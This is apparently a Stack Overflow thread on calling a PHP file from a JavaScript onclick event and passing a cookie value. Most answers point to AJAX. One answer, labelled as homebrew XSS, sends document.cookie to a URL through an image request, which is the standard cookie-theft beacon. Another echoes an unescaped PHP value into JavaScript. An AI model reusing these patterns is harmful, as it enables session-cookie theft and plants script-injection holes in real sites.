# Calling a .php file in the onclick() event

Tags: php, javascript

I want to call a .php file from the OnClick event.

```
<input id="Edit" name="Edit" value="Edit Record" type="button" onclick="---call to php file----;" />
```

The code is show above. I want to call a .php file through Javascript and pass a cookie value in the query string.

Comment: @RPK you are mixing things here: php -> server side | js -> cleint side // if you want to do this you need use AJAX

Comment: Ok. I will do this through AJAX.

Answer (score 11, accepted):

If you do not want to point the browser to the .php page, you are looking for AJAX.

[AJAX with JQuery](http://docs.jquery.com/Ajax)

[AJAX with Prototype](http://24ways.org/2005/easy-ajax-with-prototype)

[AJAX with Matt Kruse's Ajax toolbox](http://www.ajaxtoolbox.com/)

if you want to take the browser to the .php page, it's as easy as this:

```
location.href = 'mypage.php';
```

Comment: Unless you want to navigate the whole page to the .php file, there is no way to do this without AJAX, sorry.

Comment: Ok, than how to execute JQuery from OnClick().

Comment: Read the documentation in the link above.  You call `$.get(url)` just like you would call any other function.

Answer (score 2):

I suggest using [jquery](http://jquery.com/) and then all you have to do is $.get("url").. It would be quite complex to do it in pure javascript.

This is assuming you want to open the php through AJAX (ie, without actually showing the .php page to the user as it normally happens when you click a link)

Comment: @Koper: Unrelated to this answer... The massive number of downvotes you reported have been removed and your reputation has been recalculated.

Answer (score 0):

"...and pass a cookie value in the query string."

This is not necessary since php can read the values of cookies directly through the $_COOKIES superglobal anyway. Unless you are doing some cross-domain stuff here that is.

Answer (score 0):

you don't *have* to use AJAX, you could use any external tag, like iframe, link, script, image, and homebrew your own XSS solution (which, to be honest is what it sounds like you're doing anyways...)

```
function xssFunc( )
{
    ( new Image ).src = 'http://my.url/page.php?cookie' + encodeURIComponent( document.cookie );
}

document.getElementById( 'whatevs' ).onClick = xssFunc;
```

however, if you want to use the contents afterward, I'd use AJAX or an iframe (if you need to do it across domains).

Answer (score 0):

```
function call_php_program(code) {
    $.get("/php/php_program.php?code=" + code);
    return false;
}

onclick="call_php_program('<? echo $code; ?>')"
```

Comment: Hi and welcome to StackOverflow. Please add some explanation to your answer to make it more valuable for others. See http://stackoverflow.com/help/how-to-answer